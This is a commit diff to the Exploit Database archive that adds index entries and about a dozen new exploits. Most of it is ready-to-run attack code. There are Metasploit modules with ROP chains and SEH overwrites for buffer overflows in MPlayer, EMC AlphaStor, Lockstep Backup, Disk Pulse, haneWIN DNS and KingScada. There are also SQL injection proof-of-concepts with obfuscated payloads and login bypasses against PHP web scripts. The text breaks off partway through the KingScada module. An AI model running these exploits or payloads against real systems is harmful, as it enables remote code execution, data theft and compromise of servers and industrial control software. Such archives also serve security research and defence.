DB: 2017-09-15

13 new exploits

MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)

Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit)
Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)
EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)
EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)
Lockstep Backup for Workgroups 4.0.3 - Buffer Overflow (Metasploit)
Disk Pulse Server 2.2.34 - GetServerInfo Buffer Overflow (Metasploit)
haneWIN DNS Server 1.5.3 - Buffer Overflow (Metasploit)
KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit)
Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)
Enterprise Edition Payment Processor Script 3.7 - SQL Injection
Adserver Script 5.6 - SQL Injection
PTC KSV1 Script 1.7 - 'type' Parameter SQL Injection
Theater Management Script - SQL Injection
Justdial Clone Script - 'fid' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-09-15 05:01:22 +00:00
parent 183eb53e48
commit 6e81f8d635
15 changed files with 965 additions and 3 deletions

View file

@ -9235,6 +9235,7 @@ id,file,description,date,author,platform,type,port
42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver <= 12.4.0 - Kernel Pool Overflow",2017-09-12,mr_me,windows,local,0
42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15804,7 +15805,7 @@ id,file,description,date,author,platform,type,port
42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
42683,platforms/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,windows,remote,0
42691,platforms/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit)",2017-09-13,"James Fitts",php,remote,0
42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",php,remote,0
42693,platforms/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
42694,platforms/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,46824
42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0
@ -15819,6 +15820,13 @@ id,file,description,date,author,platform,type,port
42708,platforms/linux/remote/42708.rb,"Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
42709,platforms/linux/remote/42709.rb,"Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
42711,platforms/windows/remote/42711.txt,"Microsoft Windows .NET Framework - Remote Code Execution",2017-09-13,Voulnet,windows,remote,0
42719,platforms/windows/remote/42719.rb,"EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,3500
42720,platforms/windows/remote/42720.rb,"EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,3000
42721,platforms/windows/remote/42721.rb,"Lockstep Backup for Workgroups 4.0.3 - Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,2125
42722,platforms/windows/remote/42722.rb,"Disk Pulse Server 2.2.34 - GetServerInfo Buffer Overflow (Metasploit)",2010-10-19,"James Fitts",windows,remote,0
42723,platforms/windows/remote/42723.rb,"haneWIN DNS Server 1.5.3 - Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,53
42724,platforms/windows/remote/42724.rb,"KingScada AlarmServer 3.1.2.13 - Stack Buffer Overflow (Metasploit)",2017-09-14,"James Fitts",windows,remote,12401
42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -38492,3 +38500,8 @@ id,file,description,date,author,platform,type,port
42705,platforms/windows/webapps/42705.rb,"Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
42706,platforms/windows/webapps/42706.rb,"Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
42707,platforms/windows/webapps/42707.txt,"Carel PlantVisor 2.4.4 - Directory Traversal",2011-09-13,"Luigi Auriemma",windows,webapps,0
42713,platforms/php/webapps/42713.txt,"Enterprise Edition Payment Processor Script 3.7 - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
42714,platforms/php/webapps/42714.txt,"Adserver Script 5.6 - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
42715,platforms/php/webapps/42715.txt,"PTC KSV1 Script 1.7 - 'type' Parameter SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
42716,platforms/php/webapps/42716.txt,"Theater Management Script - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0
42717,platforms/php/webapps/42717.txt,"Justdial Clone Script - 'fid' Parameter SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

View file

@ -63,8 +63,8 @@ and user role of the admin in the comment section
Reference:
=========
Video POC :
https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
1. https://www.youtube.com/watch?v=8GZg1IuSfCs
2. https://www.techipick.com/exploiting-router-authentication-through-web-interface
Disclosure Timeline:
======================================

34
platforms/php/webapps/42713.txt Executable file
View file

@ -0,0 +1,34 @@
# # # # #
# Exploit Title: Enterprise Edition Payment Processor Script 3.7 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/payment-processor-script.php
# Demo: http://www.enterprise-edition.gvmhosting.com/
# Version: 3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
#
# http://localhost/[PATH]/login
#
# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
#
# http://localhost/[PATH]/products?id=[SQL]&action=update
#
# -1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update
#
# http://localhost/[PATH]/bank?id=[SQL]&action=update
#
# Etc..
# # # # #

27
platforms/php/webapps/42714.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Adserver Script 5.6 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/adserverscript.php
# Demo: http://adserverscript.gvmhosting.com/
# Version: 5.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an advertiser to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/manage-target.php?id=[SQL]&wap=0
#
# 13-13'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION())--+-&wap=0
#
# Etc..
# # # # #

27
platforms/php/webapps/42715.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: PTC KSV1 Script 1.7 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/ptc-ksv1.php
# Demo: http://www.ksv1demo.gvmhosting.com/
# Version: 1.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/gpt.php?v=entry&type=[SQL]&id=1&
#
# +'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=1&
#
# Etc..
# # # # #

31
platforms/php/webapps/42716.txt Executable file
View file

@ -0,0 +1,31 @@
# # # # #
# Exploit Title: Theater Management Script - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/8o2b4417538/php-scripts/theater-management-script
# Demo: http://198.38.86.159/~dineshkumarwork/demo/movie/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/show-time.php?moid=[SQL]
#
# -100'++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329)--+-
#
# http://localhost/[PATH]/event-detail.php?eid=[SQL]
#
# http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
#
# Etc..
# # # # #

27
platforms/php/webapps/42717.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Justdial Clone Script - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/z1mt4303451/php-scripts/justdial-clone-script
# Demo: http://74.124.215.220/~jusdil/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/restaurants-details.php?fid=[SQL]
#
# 46'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
#
# Etc..
# # # # #

134
platforms/windows/local/42718.rb Executable file
View file

@ -0,0 +1,134 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Mplayer SAMI Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
SMPlayer 0.6.9 (Permanent DEP /AlwaysON). The overflow is
triggered during the parsing of an overly long string found
in a malicious SAMI subtitle file.
},
'License' => MSF_LICENSE,
'Author' => [ 'James Fitts' ],
'Version' => '$Revision: $',
'References' =>
[
[ 'BID', '49149' ],
[ 'OSVDB', '74604' ],
[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/mplayer_sami_subtitle_file_overflow' ],
[ 'URL', 'http://labs.mwrinfosecurity.com/assets/149/mwri_mplayer-sami-subtitles_2011-08-12.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d\x3c\x7b",
'StackAdjustment' => -3500,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'DisableNops' => 'True',
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 EN',
{
# pushad/ retn
# msvcrt.dll
'Ret' => 0x77c12df9,
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Jun 14 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msfmsfa.smi']),
], self.class)
end
def make_nops(cnt)
return "\x41" * cnt
end
def exploit
# Chain 2 => kernel32!virtualalloc
# msvcrt.dll
gadgets = [
0x77c23e7a, # XOR EAX, EAX/ RETN
0x77c13ffd, # XCHG EAX, ECX/ RETN
0x77c2c84b, # MOV EBX, ECX/ MOV ECX, EAX/ MOV EAX, ESI/ POP ESI/ RETN 10
0x41414141,
0x77c127e5, # INC EBX/ RETN
0x41414141,
0x41414141,
0x41414141,
0x41414141,
0x77c3b860, # POP EAX/ RETN
0x41414141,
0x77c2d998, # POP ECX/ RETN
0x41413141,
0x77c47918, # SUB EAX, ECX/ RETN
0x77c58fbc, # XCHG EAX, EDX/ RETN
0x77c3b860, # POP EAX/ RETN
0x41414141,
0x77c2d998, # POP ECX/ RETN
0x41414101,
0x77c47918, # SUB EAX, ECX/ RETN
0x77c13ffd, # XCHG EAX, ECX/ RETN
0x77c53f3a, # POP EBP/ RETN
0x77c53f3a, # POP EBP/ RETN
0x77c39dd3, # POP EDI/ POP ESI/ RETN
0x77c39dd5, # ROP NOP
0x77c168cd, # JMP EAX
0x77c21d16, # POP EAX/ RETN
0x7c809af1, # kernel32!virtualalloc
0x77c12df9, # PUSHAD/ RETN
0x77c35524, # PUSH ESP/ RETN
].flatten.pack("V*")
p = make_nops(16) + payload.encoded
boom = pattern_create(979)
boom << [target.ret].pack('V')
boom[83, gadgets.length] = gadgets
boom[203, p.length] = p
# Chain 1 => Stack Pivot
boom[963, 4] = [0x41414101].pack('V') # Size
boom[967, 4] = [0x77c58fbc].pack('V') # XCHG EAX, EDX/ RETN => exec 2
boom[971, 4] = [0x77c59f6b].pack('V') # ADD DH, BL/ RETN => exec 1
boom[975, 4] = [0x77c15ed5].pack('V') # XCHG EAX, ESP/ RETN => exec 3
smi = %Q|<SAMI>
<BODY>
<SYNC Start=0>
#{rand_text_alpha_upper(40)}
#{boom}
</SAMI>|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(smi)
end
end
__END__

124
platforms/windows/remote/42719.rb Executable file
View file

@ -0,0 +1,124 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Library Manager Opcode 0x4f',
'Description' => %q{
This module exploits a stack based buffer overflow found in EMC
Alphastor Library Manager version < 4.0 build 910. The overflow
is triggered due to a lack of sanitization of the pointers used
for two strcpy functions.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-029/' ],
[ 'CVE', '2013-0946' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'wfsdelay' => 1000
},
'Privileged' => true,
'Payload' =>
{
'Space' => 160,
'DisableNops' => 'true',
'BadChars' => "\x00\x09\x0a\x0d",
'StackAdjustment' => -404,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Server 2003 SP2 EN',
{
# msvcrt.dll
# add esp, 0c/ retn
'Ret' => 0x77bdda70,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 13 2014'))
register_options(
[
Opt::RPORT(3500)
], self.class )
end
def exploit
connect
p = "\x90" * 8
p << payload.encoded
# msvcrt.dll
# 96 bytes
rop = [
0x77bb2563, # pop eax/ retn
0x77ba1114, # ptr to kernel32!virtualprotect
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
0xfeedface,
0x77bb0c86, # xchg eax, esi/ retn
0x77bc9801, # pop ebp/ retn
0x77be2265,
0x77bb2563, # pop eax/ retn
0x03C0990F,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb48d3, # pop eax/ retn
0x77bf21e0,
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
0x77bbfc02, # pop ecx/ retn
0x77bef001,
0x77bd8c04, # pop edi/ retn
0x77bd8c05,
0x77bb2563, # pop eax/ retn
0x03c0984f,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb8285, # xchg eax, edx/ retn
0x77bb2563, # pop eax/ retn
0x90909090,
0x77be6591, # pushad/ add al, 0efh/ retn
].pack("V*")
buf = Rex::Text.pattern_create(514)
buf[0, 2] = "O~" # opcode
buf[13, 4] = [0x77bdf444].pack('V') # stack pivot 52
buf[25, 4] = [target.ret].pack('V') # stack pivot 12
buf[41, 4] = [0x77bdf444].pack('V') # stack pivot 52
buf[57, 4] = [0x01167e20].pack('V') # ptr
buf[69, rop.length] = rop
buf[165, 4] = [0x909073eb].pack('V') # jmp $+117
buf[278, 4] = [0x0116fd59].pack('V') # ptr
buf[282, p.length] = p
buf[512, 1] = "\x00"
# junk
buf << "AAAA"
buf << "BBBB"
buf << "CCCC"
buf << "DDDD"
print_status("Trying target %s..." % target.name)
sock.put(buf)
handler
disconnect
end
end

112
platforms/windows/remote/42720.rb Executable file
View file

@ -0,0 +1,112 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Device Manager Opcode 0x72',
'Description' => %q{
This module exploits a stack based buffer overflow vulnerability
found in EMC Alphastor Device Manager. The overflow is triggered
when sending a specially crafted packet to the rrobotd.exe service
listening on port 3000. During the copying of strings to the stack
an unbounded sprintf() function overwrites the return pointer
leading to remote code execution.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', '0day' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 160,
'DisableNops' => 'true',
'BadChars' => "\x00\x09\x0a\x0d",
'StackAdjustment' => -404,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'ConnectionType' => '+ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Server 2003 SP2 EN',
{
# pop eax/ retn
# msvcrt.dll
'Ret' => 0x77bc5d88,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 14 2013'))
register_options(
[
Opt::RPORT(3000)
], self.class )
end
def exploit
connect
# msvcrt.dll
# 96 bytes
rop = [
0x77bb2563, # pop eax/ retn
0x77ba1114, # ptr to kernel32!virtualprotect
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
0xfeedface,
0x77bb0c86, # xchg eax, esi/ retn
0x77bc9801, # pop ebp/ retn
0x77be2265,
0x77bb2563, # pop eax/ retn
0x03C0990F,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb48d3, # pop eax/ retn
0x77bf21e0,
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
0x77bbfc02, # pop ecx/ retn
0x77bef001,
0x77bd8c04, # pop edi/ retn
0x77bd8c05,
0x77bb2563, # pop eax/ retn
0x03c0984f,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb8285, # xchg eax, edx/ retn
0x77bb2563, # pop eax/ retn
0x90909090,
0x77be6591, # pushad/ add al, 0efh/ retn
].pack("V*")
buf = "\xcc" * 550
buf[246, 4] = [target.ret].pack('V')
buf[250, 4] = [0x77bf6f80].pack('V')
buf[254, rop.length] = rop
buf[350, payload.encoded.length] = payload.encoded
packet = "\x72#{buf}"
print_status("Trying target %s..." % target.name)
sock.put(packet)
handler
disconnect
end
end

View file

@ -0,0 +1,88 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Lockstep Backup for Workgroups <= 4.0.3',
'Description' => %q{
This module exploits a stack buffer overflow found in
Lockstep Backup for Workgroups <= 4.0.3. The vulnerability
is triggered when sending a specially crafted packet that
will cause a login failure.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://secunia.com/advisories/50260/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 2000 ALL EN',
{
# msvcrt.dll
# pop ecx/ pop ecx/ retn
'Ret' => 0x780146c0,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 11 2013'))
register_options(
[
Opt::RPORT(2125),
OptString.new('USERNAME', [ true, 'Username of victim', 'msf' ])
], self.class )
end
def exploit
connect
uname = datastore['USERNAME']
p = "\x90" * 16
p << payload.encoded
packet = rand_text_alpha_upper(10000)
packet[0, 8] = "BFWCA\x01\x01\x00"
packet[8, uname.length] = "#{uname}\x00"
packet[73, p.length] = p
packet[7197, 4] = "\xeb\x06\x90\x90" # jmp $+8
packet[7201, 4] = [target.ret].pack('V')
packet[7205, 8] = "\x90" * 8
packet[7213, 2] = "\xff\xe7" # jmp edi
print_status("Trying target %s..." % target.name)
sock.put(packet)
handler
disconnect
end
end

105
platforms/windows/remote/42722.rb Executable file
View file

@ -0,0 +1,105 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Pulse Server \'GetServerInfo\' Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability found
in libpal.dll of Disk Pulse Server v2.2.34. The overflow
is triggered when sending an overly long 'GetServerInfo'
request to the service listening on port 9120.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'BID', '43919' ],
[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/disk_pulse_getserverinfo' ],
[ 'URL', 'http://www.coresecurity.com/content/disk-pulse-server-getserverinfo-request-buffer-overflow-exploit-10-5' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00\x0a\x0d\x20",
'DisableNops' => 'True',
'StackAdjustment' => -3500,
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# p/p/r
# libspp.dll
'Ret' => 0x1006f71f,
'Offset' => 303
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 19 2010'))
register_options([Opt::RPORT(9120)], self.class)
end
def exploit
connect
sploit = "GetServerInfo"
sploit << "\x41" * 8
sploit << payload.encoded
sploit << "\x42" * (303 - (8 + payload.encoded.length))
sploit << generate_seh_record(target.ret)
sploit << make_nops(4)
sploit << "\xe9\xc4\xfe\xff\xff" # jmp $-311
sploit << rand_text_alpha_upper(200)
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
end
end
__END__
0033C05C 55 PUSH EBP
0033C05D 8B6C24 1C MOV EBP,DWORD PTR SS:[ESP+1C]
0033C061 3AC2 CMP AL,DL
0033C063 74 14 JE SHORT libpal.0033C079
0033C065 3C 0D CMP AL,0D
0033C067 74 10 JE SHORT libpal.0033C079
0033C069 3C 0A CMP AL,0A
0033C06B 74 0C JE SHORT libpal.0033C079
0033C06D 41 INC ECX
0033C06E 88042F MOV BYTE PTR DS:[EDI+EBP],AL
0033C071 47 INC EDI
0033C072 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI]
0033C075 84C0 TEST AL,AL
0033C077 ^75 E8 JNZ SHORT libpal.0033C061
0033C079 C6042F 00 MOV BYTE PTR DS:[EDI+EBP],0
0033C07D 5D POP EBP
0033C07E 5F POP EDI
0033C07F 890B MOV DWORD PTR DS:[EBX],ECX
0033C081 5E POP ESI
0033C082 B8 01000000 MOV EAX,1
0033C087 5B POP EBX
0033C088 C3 RETN

View file

@ -0,0 +1,74 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'haneWIN DNS Server Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in
haneWIN DNS Server <= 1.5.3. The vulnerability is triggered
by sending an overly long packet to the victim server. A memcpy
function blindly copies user supplied data to a fixed size buffer
leading to remote code execution.
This module was tested against haneWIN DNS 1.5.3
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '31260' ],
[ 'OSVDB', '102773' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x20",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Windows 2000 SP4 EN / haneWIN DNS 1.5.3',
{
# msvcrt.dll v6.10.9844.0
# pop esi/ pop edi/ retn
'Ret' => 0x78010394,
}
]
],
'DisclosureDate' => 'Jul 27 2013'))
register_options([Opt::RPORT(53)], self.class)
end
def exploit
connect
p = make_nops(32) + payload.encoded
buf = Rex::Text.pattern_create(5000)
buf[0, 2] = [0x4e20].pack('n') # length for malloc
buf[1332, p.length] = p
buf[2324, 8] = generate_seh_record(target.ret)
buf[2332, 15] = make_nops(10) + "\xe9\x13\xfc\xff\xff" # jmp $-1000
print_status("Sending malicious request...")
sock.put(buf)
disconnect
end
end

View file

@ -0,0 +1,78 @@
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'KingScada AlarmServer Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
KingScada < 3.1.2.13. The vulnerability is triggered when
sending a specially crafted packet to the 'AlarmServer'
(AEserver.exe) service listening on port 12401. During the
parsing of the packet the 3rd dword is used as a size value
